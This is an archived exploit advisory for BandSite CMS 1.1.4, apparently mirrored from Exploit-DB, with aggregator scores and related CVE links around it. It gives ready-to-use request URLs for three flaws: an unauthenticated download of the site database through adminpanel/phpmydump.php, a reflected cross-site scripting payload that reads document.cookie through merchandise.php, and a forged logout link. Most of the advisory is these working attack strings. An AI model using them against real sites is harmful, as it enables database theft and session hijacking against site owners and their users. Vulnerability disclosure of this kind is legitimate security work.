Lucene search
SirGodEDB-ID:6286HistoryAug 21, 2008 - 12:00 a.m.
BandSite CMS 1.1.4 - Download Backup / Cross-Site Scripting / Cross-Site Request Forgery
2008-08-2100:00:00
SirGod
www.exploit-db.com
27
AI Score
7.4
Confidence
Low
###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################
[+] Arbitrary Download Database
Go to
http://localhost/[Path]/adminpanel/phpmydump.php
and the download will begin ( database.sql ) .
[+] Cross Site Scripting
http://localhost/[Path]/merchandise.php?type=[XSS]
http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>
[+] Cross Site Request Forgery
If a logged in user with administrator privilegies click the following url he will be logged out.
http://localhost/[Path]/adminpanel/logout.php
###########################################################################
# milw0rm.com [2008-08-21]Related
cve
cve
nvd
nvd
cvelist
cvelist
prion
prion
Cross site request forgery (csrf)
2009-08-24 19:30:00
Cross site scripting
2009-08-24 19:30:00
Server side request forgery (ssrf)
2009-08-24 19:30:00